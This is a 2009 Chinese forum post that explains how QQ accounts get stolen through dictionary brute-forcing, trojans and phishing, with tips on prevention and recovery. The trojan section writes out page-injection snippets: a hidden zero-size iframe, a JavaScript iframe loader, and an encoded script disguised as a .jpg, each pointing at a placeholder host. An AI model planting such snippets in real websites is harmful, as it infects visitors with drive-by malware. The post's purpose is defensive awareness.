南瓜园

 找回密码
 注册
查看: 3082|回复: 1

全面解析QQ盗号,防QQ被盗

[复制链接]
发表于 2009-1-14 15:40:28 | 显示全部楼层 |阅读模式
QQ盗号总的来说可分为3中盗号方式:1,本地破解. 2,利用木马,远程盗号. 3,网络钓鱼
好了,下面我来对这3种盗号方式,逐一讲解!
-------本地破解.既是利用黑客字典,进行暴力破解!这里我先在初略的讲解下QQ登陆的过程.在QQ客户端(也就是输入QQ号,密码的登陆筐)当你输入QQ号和密码后,QQ客户端客户端会把你输入的相关信息发送给QQ的服务器,当QQ的服务器收到你发送的过来请求登陆的信息后,会在数据库里查找相关信息看是否匹配,如果匹配,就进行确认,并允许登陆,如果不匹配,就会返回相关的不正确信息(如找不到此QQ号,或者密码错误等).当然为了安全起见,QQ客户端并不会真的发送你所填写的账号和密码,而先经过预先规定好的算法,进行计算,得到一个值,发送给服务器,然后服务器在经过那个算法,把这个值还原,在查找数据库.好了,了解QQ登陆的过程,我们在来看下本地暴力破解的原理,其实就是就是利用事先制作好的黑客字典(这里的字典,不是我们一般所说的什么清华字典,而已纪录一串字符的文本文档,而这些字符里面,可能就有你的密码在其中)与服务器进行匹配对照,比如你的密码是123,那么首先对照111,不对!就对照112!不对,在对照113....依次下去,直到对照123,匹配,那么自然就知道你的密码是123了.看到这里,可能有的人就会想我把密码设长点,随便让他这样慢慢猜下去!但是你要知道计算机的计算速度是很快的,至于多快,自己可以去想下,反正一个8位数纯数字密码,P4的CPU只需要几个小时而已!那么如何防止破解呢??其实还是要加强密码强度,密码不光是数字,还要有字母和特殊字符.一个16位的数字+字母+特殊字符,学过排列组合的人自己可以去算下有多少种组合方式,足够黑客破解100年了的!

--------利用木马,远程盗号!这大概是目前最流行的盗号方式了.本地破解还耗时间,网络钓鱼对技术有一定要求!所以利用木马这个技术含量又低,操作又简单,收效又快的方法,自然得到许多人亲睐!当时利用木马的盗号方式也是五花八门,这里我主要介绍及格常见的盗号方式!
1,最简单的,自然是直接把木马发送给别人,让别人点击运行木马!好在这世上象这么傻的人不多!那么盗号者自然会想其他的方法,用的最多的自然是社会工程学,简单的说就是利用别人一些好奇,贪欲等心里!比如把一个盗号木马和一个小游戏或视频,MP3等捆绑后,发给你(如通过QQ,或者邮箱),你要是一不小心,运行了.显示还是游戏或者视频,但是木马已经偷偷的在你机器上扎根了!所以不要轻易接受别人发送过来的东西,跟不要轻易点击运行
2,现在都流行网站挂马!其实那些挂马的人真正是利用自己技术入侵网站在挂马的没几个,一般就是利用一些,现成的工具,或者网站公布的漏洞(象以前的DVBBSV7.0的上传漏洞就闹的比较凶).鄙视一些这些人先!至于如何入侵网站,不在本文讨论范围之内,我可以先提一下一般的方法就是利用上传漏洞,暴库,XSS攻击,SQL注入,旁注攻击等等
这里就不多说,一般在去得网站的WEBSHELL后,就实行挂马了.在挂马之前一般都需要有个可以访问空间,将一些QQ木马利用网页木马生成器,制作成网页木马,然后上传到自己的空间上去,这里假设空间是www.xxx.com.一般的挂马方式有一下几种,最简单,应用最广泛的就是框架挂马,即在一个网页里插入<iframe src="http://www.xxx.com(网页木马的地址)" width=0 heigth=0></iframe>,当你访问这个网页的时候,同时就会访问http://www.xxx.com这个网页,然后就中了木马!但是这很容易被发现.隐蔽一点的就属JS挂马了,先在一个记事本文档里写入document.write(<iframe src="http://www.xxx.com(网页木马的地址)" width=0 heigth=0></iframe>),保存为XX.JS,然后在一网页里插入如下代码<script language="javascript" scr="http://www.xxx.com/XX.js">,当你访问这个网页的时候,同时也会访问http://www.xxx.com/XX.js的XX.JS文件,然后调用里面的代码,自然也就中了木马了!当然还有更隐蔽的,就是JS文件加密挂马,先在一个记事本文档里写入document.write(<iframe src="http://www.xxx.com(网页木马的地址)" width=0 heigth=0></iframe>),保存为MM.jpg ,然后在一网页里插入如下代码<script language="jscript.Encode" scr="http://www.xxx.com/MM.JPG">,很具有迷惑性,一般的管理员很难发现,不过对高手来说,也不算什么!当然挂马的方式还有很多很多,这里只向大家介绍常用的几种,让大家了解一下!
从以上挂马的方式可以看出,要想挂马,必须首先要入侵网站.然后才能实行挂马的手段.而一些大型网站完全性自然要高很多,被挂马的几率也会小很多!所以建议大家养成良好的上网习惯,不要看见网页就点,特别是网页中的一些广告.也不要浏览一些不健康的网站,也不要随意亲信别人点别人发给你的网站,还有下载软件的时候,最好去一些大型站点如华军,天空等!最好不要在一些个人网站下什么东西!杀毒软件,防火墙是少不了的,关键是安全意识!
-------网络钓鱼.相信大家也见过不少.一般有些人,将一些门户网站的首页下载或者将整个站点下载下来,然后申请个很相似的域名,让下载下来的站点,上传到自己空间,然后等着别人去登陆,由于网站看起来一样(那是因为将整个网站就下载下来了,着对高说不算什么),域名也很相似,所以有些人就是以为是真的官方网站,然后就毫不犹豫的填写自己饿账号,密码.然后自己银行卡上的钱不翼而非飞,游戏的里人物被洗劫光光! 所以大家平时上官方网站的时候,要小心,看是否是真正的官方网站,要是别人告诉你的,就更要小心,仔细观察域名,有可能就是一个字母之差!

好了常见的QQ盗号方式就以上几种,当然还有其他方法,但是那都是需要高深的技术的,我相信具有那些的技术的人是不屑QQ盗号这种猥亵的行为的!
总结以上的防御方法,杀毒软件,防火墙不能少!杀毒软件国外就用卡巴,nod32的把!国内的就瑞星,金山等等!防火墙,天网个人版不错!当时安全意识最重要这是我一再强调的,要不然重然你的杀毒软件在牛B,你的机器一样是个毒窝子!不要亲信陌生人的消息,不要轻易点击陌生人发来的网址,不要接受并运行陌生人发来的软件!不要浏览一些不健康的网站,浏览一些个人网站和小型网站的时候,要小心(那些都是经常被挂马的对象).最好去大型的下载站点去下载软件!等等..这些习惯都要靠自己慢慢样成的
最后说一下中了病毒木马后怎么处理!首先断开网络,备份重要数据(非常重要)莫等数据丢失,在骂娘!然后进入安全模式下扫描杀毒!如果不行,准备DOS下的杀毒软件,在DOS下杀毒!
推荐一些比较好的安全工具,sreng,xdelbox,冰刃,windows清理助手,很不错,我经常用来手动杀毒,比杀毒软件要好用的多!当然想手工杀毒,先补习下一些系统知识和网络知识先~

这里告诉大家一个小技巧,就是在你输入密码的时候,看能不能复制,粘贴.如果可以的话,那就要注意,极有可能是中了木马!还有一般登陆QQ之前,用QQ医生扫一遍,如果QQ医生被异常屏蔽,一般也是木马所为,平时在输入密码的时候,观察一下每个*号字符是否紧密接连,如果中间有一些缝隙,也有可能是中了木马!(这些都是我的个人经验饿)

最后说下,QQ被盗,利用密码保护,把QQ找回来,然后修改密码,密码保护要是忘了就利用QQ申诉!
在不行的话,请尽量备份一份盗走你QQ的那个木马,发给我或者一些高手,看能不能进行反编译或嗅探找出盗你QQ的那个人,要回QQ(他要是不给,就不要怪我不客气了)
发表于 2009-6-8 09:45:20 | 显示全部楼层
沙发!顶顶顶
您需要登录后才可以回帖 登录 | 注册

本版积分规则

请大家牢记南瓜园网址 www.nan2008.com

QQ|小黑屋|手机版|Archiver|南瓜园

GMT+8, 2024-12-26 14:29 , Processed in 0.093447 second(s), 19 queries .

Powered by Discuz! X3.4

© 2001-2017 Comsenz Inc.

快速回复 返回顶部 返回列表